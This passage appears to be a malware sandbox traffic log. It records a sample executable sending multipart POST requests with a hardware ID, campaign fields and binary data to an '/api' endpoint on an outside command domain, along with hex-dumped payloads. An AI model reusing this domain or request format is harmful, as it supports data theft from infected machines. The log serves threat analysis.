                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC895INData Raw: 39 54 5a 74 45 6d 46 64 2b 50 56 67 46 6f 6a 71 68 2b 2b 49 41 37 41 53 67 58 4b 73 56 6e 72 58 44 47 67 43 4f 4e 4c 4d 50 6a 76 49 56 32 42 2b 69 55 47 55 6a 51 67 65 38 4e 75 62 73 70 52 36 6a 42 4b 51 61 2f 46 62 57 39 34 30 59 47 38 46 72 38 69 2b 4d 2f 68 62 50 47 72 73 55 63 47 4a 55 53 4c 55 77 6f 62 7a 73 48 36 49 43 6f 52 7a 68 58 5a 32 79 79 41 30 49 69 44 36 2f 44 35 48 33 47 74 67 58 72 56 35 6c 49 30 63 4d 76 7a 48 6e 35 4b 78 5a 34 6b 4f 72 42 4c 4d 4e 31 70 72 49 44 77 53 4e 4a 66 41 31 33 4f 4a 62 77 6c 65 74 57 43 39 30 44 51 43 33 50 2b 4c 76 6f 78 71 6b 43 4c 34 63 34 56 4f 62 76 4e 38 5a 42 6f 38 35 73 52 32 57 38 78 50 59 48 71 46 64 61 69 74 4a 53 50 78 38 35 76 7a 73 51 65 77 69 6f 52 66 2f 58 34 47 35 6a 51 42 4e 6d 48 4f 31 41 39
                                                                                                                                                                                                                                                                                        Data Ascii: 9TZtEmFd+PVgFojqh++IA7ASgXKsVnrXDGgCONLMPjvIV2B+iUGUjQge8NubspR6jBKQa/FbW940YG8Fr8i+M/hbPGrsUcGJUSLUwobzsH6ICoRzhXZ2yyA0IiD6/D5H3GtgXrV5lI0cMvzHn5KxZ4kOrBLMN1prIDwSNJfA13OJbwletWC90DQC3P+LvoxqkCL4c4VObvN8ZBo85sR2W8xPYHqFdaitJSPx85vzsQewioRf/X4G5jQBNmHO1A9
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC1369INData Raw: 34 39 36 38 0d 0a 41 5a 76 72 56 63 52 5a 73 78 52 6f 49 41 31 51 38 6a 50 75 36 36 51 5a 72 51 65 68 47 50 4a 59 6d 72 44 4f 45 77 2b 4a 50 72 34 4c 6b 2f 55 64 32 42 2b 34 57 6d 45 71 53 77 69 33 66 4b 2b 6b 71 77 48 73 57 2b 77 34 2f 55 4b 43 73 6f 38 71 41 49 38 39 74 52 6e 63 34 6c 76 43 56 36 31 59 4c 33 51 4e 42 72 38 33 37 65 4f 6c 47 4b 38 44 70 68 4c 38 58 35 36 78 7a 52 49 43 69 6a 75 30 41 70 66 79 47 74 77 66 71 56 68 71 49 55 35 49 2f 48 7a 6d 2f 4f 78 42 37 43 61 69 48 2b 4a 45 31 49 7a 4f 45 51 32 47 4a 66 49 51 30 75 52 56 33 42 76 71 44 43 38 6d 53 67 2b 32 4d 65 76 6e 71 42 32 68 44 4b 55 56 2b 6b 65 63 74 63 4d 4e 44 6f 73 32 76 41 4f 5a 38 68 58 61 46 71 52 65 5a 47 77 44 53 4c 55 6b 6f 62 7a 73 4e 71 45 54 76 68 62 34 52 4e 53 4d 7a
                                                                                                                                                                                                                                                                                        Data Ascii: 4968AZvrVcRZsxRoIA1Q8jPu66QZrQehGPJYmrDOEw+JPr4Lk/Ud2B+4WmEqSwi3fK+kqwHsW+w4/UKCso8qAI89tRnc4lvCV61YL3QNBr837eOlGK8DphL8X56xzRICiju0ApfyGtwfqVhqIU5I/Hzm/OxB7CaiH+JE1IzOEQ2GJfIQ0uRV3BvqDC8mSg+2MevnqB2hDKUV+kectcMNDos2vAOZ8hXaFqReZGwDSLUkobzsNqETvhb4RNSMz
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC1369INData Raw: 72 38 69 43 66 36 78 2b 62 43 4f 52 4e 4c 79 74 42 53 4f 70 38 36 2b 69 6f 47 71 41 4b 6f 42 48 79 55 5a 47 30 79 52 38 46 68 7a 61 7a 42 4a 54 78 47 74 45 62 72 6c 68 6d 4b 6b 45 4c 73 54 71 68 71 75 77 65 74 45 50 30 58 4e 4a 59 6e 62 58 4e 48 42 4b 47 63 2f 78 50 6b 76 73 56 6d 30 2b 38 52 48 67 72 55 6b 61 72 66 4f 62 6f 37 45 48 73 43 62 34 5a 2f 56 47 63 76 4d 6b 54 43 59 45 32 6f 41 65 61 2b 68 6e 54 45 71 56 53 61 69 46 4b 41 37 45 75 38 2b 65 6f 46 36 42 44 34 6c 7a 30 54 64 62 68 6a 54 6f 55 67 69 4f 30 44 4e 7a 69 57 38 4a 58 72 56 67 76 64 41 30 49 76 44 44 71 34 36 63 53 71 41 65 73 45 66 68 62 6d 4c 44 42 46 77 2b 47 49 62 38 4b 6c 50 63 63 33 68 75 6e 56 33 30 76 54 45 6a 38 66 4f 62 38 37 45 48 73 4a 4a 38 72 30 42 57 4a 39 39 52 66 42 49
                                                                                                                                                                                                                                                                                        Data Ascii: r8iCf6x+bCORNLytBSOp86+ioGqAKoBHyUZG0yR8FhzazBJTxGtEbrlhmKkELsTqhquwetEP0XNJYnbXNHBKGc/xPkvsVm0+8RHgrUkarfObo7EHsCb4Z/VGcvMkTCYE2oAea+hnTEqVSaiFKA7Eu8+eoF6BD4lz0TdbhjToUgiO0DNziW8JXrVgvdA0IvDDq46cSqAesEfhbmLDBFw+GIb8KlPcc3hunV30vTEj8fOb87EHsJJ8r0BWJ99RfBI
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC1369INData Raw: 73 50 34 61 30 46 65 31 47 6e 5a 73 53 67 54 79 5a 4b 48 6a 70 42 47 69 41 4b 6f 58 2f 31 6d 58 73 4d 73 61 43 34 59 38 74 51 61 62 2f 52 50 4a 45 4b 64 64 62 79 64 45 41 72 59 39 36 71 54 69 57 61 73 62 37 45 53 7a 5a 35 47 76 33 52 78 44 6e 6e 32 72 54 35 76 78 56 59 4e 58 70 30 5a 75 4b 56 38 4d 76 54 66 7a 37 36 6f 5a 71 52 47 72 45 50 6c 61 6c 62 48 41 48 41 75 54 4d 37 38 50 6a 75 38 54 30 42 6e 71 47 69 38 72 56 55 6a 71 66 4e 44 7a 70 31 6d 7a 54 62 56 63 39 46 6e 57 34 59 30 63 43 59 77 39 6f 41 75 61 39 68 62 56 48 36 39 63 61 79 5a 41 42 37 6b 32 36 4f 79 73 46 71 6b 4c 70 78 72 39 56 4a 43 31 77 46 39 4e 77 54 53 71 54 38 53 39 4d 73 45 61 72 45 4e 2b 47 55 6f 49 34 33 7a 2b 71 72 56 5a 71 77 2f 73 52 4c 4e 59 6d 72 50 41 47 67 65 4a 4e 4c 45
                                                                                                                                                                                                                                                                                        Data Ascii: sP4a0Fe1GnZsSgTyZKHjpBGiAKoX/1mXsMsaC4Y8tQab/RPJEKddbydEArY96qTiWasb7ESzZ5Gv3RxDnn2rT5vxVYNXp0ZuKV8MvTfz76oZqRGrEPlalbHAHAuTM78Pju8T0BnqGi8rVUjqfNDzp1mzTbVc9FnW4Y0cCYw9oAua9hbVH69cayZAB7k26OysFqkLpxr9VJC1wF9NwTSqT8S9MsEarEN+GUoI43z+qrVZqw/sRLNYmrPAGgeJNLE
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC1369INData Raw: 64 77 62 36 67 77 76 49 6b 41 4f 73 7a 33 70 37 4b 77 66 70 67 65 76 46 66 42 53 6e 37 2f 47 48 41 6d 4f 4e 4c 51 4c 6e 50 59 53 31 52 47 76 58 32 5a 73 41 30 69 31 4a 4b 47 38 37 44 2b 50 45 62 34 75 2f 56 61 4e 2b 64 4a 52 47 73 45 30 76 6b 2f 45 76 52 37 54 47 4c 68 52 5a 69 52 4a 41 62 49 34 36 2b 6d 72 47 61 6b 4f 71 52 6a 39 55 5a 47 35 77 52 41 45 69 54 79 32 44 35 4f 39 57 35 73 51 73 68 51 33 62 47 30 44 70 42 33 76 37 37 35 5a 73 30 32 31 58 50 52 5a 31 75 47 4e 45 51 71 41 4f 37 77 44 6c 50 6b 48 32 78 79 6a 57 32 34 6a 54 51 75 7a 4e 75 6e 32 71 68 6d 6e 43 36 73 55 39 31 75 45 75 4d 4a 66 54 63 45 30 71 6b 2f 45 76 53 54 4e 45 4b 31 62 4c 51 56 4b 45 37 4d 32 34 75 2b 67 57 62 4e 4e 74 56 7a 30 57 64 62 68 6a 52 49 50 6a 44 65 67 41 35 7a 39
                                                                                                                                                                                                                                                                                        Data Ascii: dwb6gwvIkAOsz3p7KwfpgevFfBSn7/GHAmONLQLnPYS1RGvX2ZsA0i1JKG87D+PEb4u/VaN+dJRGsE0vk/EvR7TGLhRZiRJAbI46+mrGakOqRj9UZG5wRAEiTy2D5O9W5sQshQ3bG0DpB3v775Zs021XPRZ1uGNEQqAO7wDlPkH2xyjW24jTQuzNun2qhmnC6sU91uEuMJfTcE0qk/EvSTNEK1bLQVKE7M24u+gWbNNtVz0WdbhjRIPjDegA5z9
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC1369INData Raw: 70 66 59 53 6c 4d 42 4c 67 37 37 2f 61 74 45 36 41 43 71 78 76 34 52 35 32 72 78 68 63 41 6a 7a 75 37 44 35 4c 39 46 4e 59 58 36 68 6f 76 4b 31 56 49 36 6e 7a 45 78 37 73 50 70 6b 47 50 43 2b 56 66 6b 62 58 62 46 41 4b 43 4a 62 38 66 33 4c 4e 56 79 68 43 37 46 44 63 36 58 52 2b 31 49 36 2f 39 37 42 36 67 51 2f 52 63 2b 46 71 59 74 4d 59 62 43 6f 51 37 73 51 71 5a 39 78 6e 58 46 71 4a 64 5a 53 6c 49 44 72 67 2f 37 2b 75 74 46 61 67 4b 6f 68 57 7a 47 39 61 2b 31 56 39 62 77 51 57 69 43 49 54 77 42 5a 6b 6c 71 55 56 2b 4f 55 41 59 74 48 37 4f 35 36 41 61 71 51 53 38 58 4f 77 62 6a 2f 6e 4b 45 30 50 5a 63 37 49 4c 6b 50 34 53 31 52 69 6e 57 32 67 6e 51 67 4b 38 4c 75 37 68 70 42 57 6b 44 72 34 57 2b 55 65 66 73 4d 41 52 43 35 4d 77 38 6b 48 63 2b 67 32 62 54
                                                                                                                                                                                                                                                                                        Data Ascii: pfYSlMBLg77/atE6ACqxv4R52rxhcAjzu7D5L9FNYX6hovK1VI6nzEx7sPpkGPC+VfkbXbFAKCJb8f3LNVyhC7FDc6XR+1I6/97B6gQ/Rc+FqYtMYbCoQ7sQqZ9xnXFqJdZSlIDrg/7+utFagKohWzG9a+1V9bwQWiCITwBZklqUV+OUAYtH7O56AaqQS8XOwbj/nKE0PZc7ILkP4S1RinW2gnQgK8Lu7hpBWkDr4W+UefsMARC5Mw8kHc+g2bT
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC1369INData Raw: 53 63 79 69 35 4b 75 44 70 70 78 57 53 50 62 6b 66 2f 56 75 52 72 39 78 66 54 63 45 38 38 6c 65 6c 76 56 32 62 4b 4f 51 55 64 32 77 56 53 49 63 2f 37 2b 71 72 44 37 31 4f 6a 42 66 6c 56 4a 75 79 77 56 30 43 6a 43 4f 31 54 39 4b 39 45 35 74 50 2b 68 6f 76 4b 46 78 49 36 6d 79 7a 76 2f 6c 4b 2b 31 50 2b 41 37 31 4d 31 71 2b 4e 52 31 48 50 63 36 42 50 78 4c 31 53 32 41 57 34 55 6d 77 36 54 6b 2b 4d 41 73 48 76 6f 42 71 67 41 71 74 63 76 52 57 5a 2b 5a 55 6d 51 34 49 68 6f 45 43 4e 36 78 6a 4c 45 4f 5a 63 66 69 46 42 53 50 78 38 72 65 43 6e 46 61 6b 45 76 46 50 68 52 5a 32 31 32 31 4d 48 6b 33 50 38 54 34 33 32 47 73 6b 5a 72 52 74 2b 4f 6b 41 59 73 54 6e 6d 71 4b 51 49 6f 51 2f 73 55 72 4e 41 6e 62 58 4c 45 68 62 4f 49 71 51 4d 69 76 70 5a 30 77 61 6e 57 43
                                                                                                                                                                                                                                                                                        Data Ascii: Scyi5KuDppxWSPbkf/VuRr9xfTcE88lelvV2bKOQUd2wVSIc/7+qrD71OjBflVJuywV0CjCO1T9K9E5tP+hovKFxI6myzv/lK+1P+A71M1q+NR1HPc6BPxL1S2AW4Umw6Tk+MAsHvoBqgAqtcvRWZ+ZUmQ4IhoECN6xjLEOZcfiFBSPx8reCnFakEvFPhRZ2121MHk3P8T432GskZrRt+OkAYsTnmqKQIoQ/sUrNAnbXLEhbOIqQMivpZ0wanWC
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC1369INData Raw: 71 6e 79 35 70 4a 6b 61 6f 67 32 72 43 75 49 59 73 4c 72 4b 47 51 43 50 4a 4b 4e 50 30 72 30 54 6d 30 2f 34 47 69 38 6f 58 45 6a 71 62 4c 4f 2f 2b 55 72 37 55 2f 34 44 76 55 7a 57 72 34 31 48 55 4d 39 7a 6f 45 2f 45 76 56 4c 56 47 71 74 58 59 53 39 66 47 72 51 2f 39 2b 66 72 4a 35 49 6d 6f 52 48 32 57 35 47 48 38 7a 34 4a 6b 54 36 39 43 4b 4c 44 49 73 6f 51 75 68 5a 4a 4c 31 73 4c 38 6e 4b 68 2f 4f 78 42 37 43 4b 6d 44 50 35 61 6b 66 6d 44 58 77 66 42 61 2f 49 71 6b 66 41 51 31 52 44 6f 64 57 55 38 51 41 65 31 66 4b 2b 6b 6f 46 6e 30 51 36 30 57 34 31 69 5a 76 6f 45 59 47 59 5a 7a 2f 45 2b 53 76 55 32 62 46 71 42 45 59 69 4e 4b 52 4c 51 79 37 36 53 7a 56 37 56 44 75 6c 79 72 42 74 6a 35 33 31 39 62 77 58 53 38 41 70 33 2b 47 39 67 46 75 46 4a 73 4f 6b 35
                                                                                                                                                                                                                                                                                        Data Ascii: qny5pJkaog2rCuIYsLrKGQCPJKNP0r0Tm0/4Gi8oXEjqbLO/+Ur7U/4DvUzWr41HUM9zoE/EvVLVGqtXYS9fGrQ/9+frJ5ImoRH2W5GH8z4JkT69CKLDIsoQuhZJL1sL8nKh/OxB7CKmDP5akfmDXwfBa/IqkfAQ1RDodWU8QAe1fK+koFn0Q60W41iZvoEYGYZz/E+SvU2bFqBEYiNKRLQy76SzV7VDulyrBtj5319bwXS8Ap3+G9gFuFJsOk5


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        3192.168.2.849709172.67.157.2544437680C:\Users\user\Desktop\MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:25 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=ZHXDL6PTAB9YT3TQ
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Content-Length: 12829
                                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:25 UTC12829OUTData Raw: 2d 2d 5a 48 58 44 4c 36 50 54 41 42 39 59 54 33 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 30 35 46 36 45 38 33 43 31 46 34 39 34 31 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 5a 48 58 44 4c 36 50 54 41 42 39 59 54 33 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 48 58 44 4c 36 50 54 41 42 39 59 54 33 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 5a 48 58 44 4c 36 50
                                                                                                                                                                                                                                                                                        Data Ascii: --ZHXDL6PTAB9YT3TQContent-Disposition: form-data; name="hwid"7605F6E83C1F4941F9F1B7136A1E0C5E--ZHXDL6PTAB9YT3TQContent-Disposition: form-data; name="pid"2--ZHXDL6PTAB9YT3TQContent-Disposition: form-data; name="lid"4h5VfH----ZHXDL6P
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:25 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 09:05:25 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=692r9r4h1rqdbr18oh24braqtm; expires=Wed, 23 Apr 2025 02:52:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAl0QoVlQ10Y57d5Q9zzoZ4HqVzw5Q17fAQtKpSY6B5Ql8P%2BozikUzc%2BsTPBtrWlHk%2FCJpDEuTSh2NqAwoC1gB3Ir%2BNdet6%2Fc5X%2F8n576%2BvsJ38bdgM9L%2BJncvokET57I44%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 8f9063748a8cf5f8-EWR
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1705&rtt_var=648&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13766&delivery_rate=1712609&cwnd=57&unsent_bytes=0&cid=f2516480e43dcd9e&ts=912&x=0"
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        4192.168.2.849710172.67.157.2544437680C:\Users\user\Desktop\MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:27 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=NMJDNFT3
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Content-Length: 15010
                                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:27 UTC15010OUTData Raw: 2d 2d 4e 4d 4a 44 4e 46 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 30 35 46 36 45 38 33 43 31 46 34 39 34 31 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 4e 4d 4a 44 4e 46 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 4d 4a 44 4e 46 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4e 4d 4a 44 4e 46 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                                                                                                                                                                                                        Data Ascii: --NMJDNFT3Content-Disposition: form-data; name="hwid"7605F6E83C1F4941F9F1B7136A1E0C5E--NMJDNFT3Content-Disposition: form-data; name="pid"2--NMJDNFT3Content-Disposition: form-data; name="lid"4h5VfH----NMJDNFT3Content-Disposition:
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:28 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 09:05:27 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=uo27dekk7u4rnll8gu8n0elt6b; expires=Wed, 23 Apr 2025 02:52:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cXnfCw%2B%2F4B6BrHEn3Yfk9dTwY6DjIC61VaxIN1namCq774DK8UcRBDzlAwFId7UXjJ5GFkChMQfH2Yy0G9fyuAv3y%2B4a7dK%2FgI0beEpgzbTmsyUVO7FiSlsYTETf1QeLhyE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 8f906382aa5bc33f-EWR
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1620&rtt_var=622&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15939&delivery_rate=1740166&cwnd=235&unsent_bytes=0&cid=c7837f9f9d86d57a&ts=863&x=0"
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        5192.168.2.849711172.67.157.2544437680C:\Users\user\Desktop\MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:29 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=U5FRMBJPQ6LUHBEW3E
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Content-Length: 20237
                                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:29 UTC15331OUTData Raw: 2d 2d 55 35 46 52 4d 42 4a 50 51 36 4c 55 48 42 45 57 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 30 35 46 36 45 38 33 43 31 46 34 39 34 31 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 55 35 46 52 4d 42 4a 50 51 36 4c 55 48 42 45 57 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 35 46 52 4d 42 4a 50 51 36 4c 55 48 42 45 57 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 55
                                                                                                                                                                                                                                                                                        Data Ascii: --U5FRMBJPQ6LUHBEW3EContent-Disposition: form-data; name="hwid"7605F6E83C1F4941F9F1B7136A1E0C5E--U5FRMBJPQ6LUHBEW3EContent-Disposition: form-data; name="pid"3--U5FRMBJPQ6LUHBEW3EContent-Disposition: form-data; name="lid"4h5VfH----U
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:29 UTC4906OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:30 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 09:05:30 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=db60gpqtfbbetdm6b4l0tcqm7v; expires=Wed, 23 Apr 2025 02:52:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8mG9wESCdEsAzJ9turZcgdCHQ5lwzyNoeWZ%2FR8K0gtVh8U%2F87bVMnTyOwFE6f%2FRFM6sABXhz%2B9MtcYanDaAq2MrONVUUcc9vv14ILy%2F9ZmLmnTJAjSIK0DWagv%2FIQrVRjk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
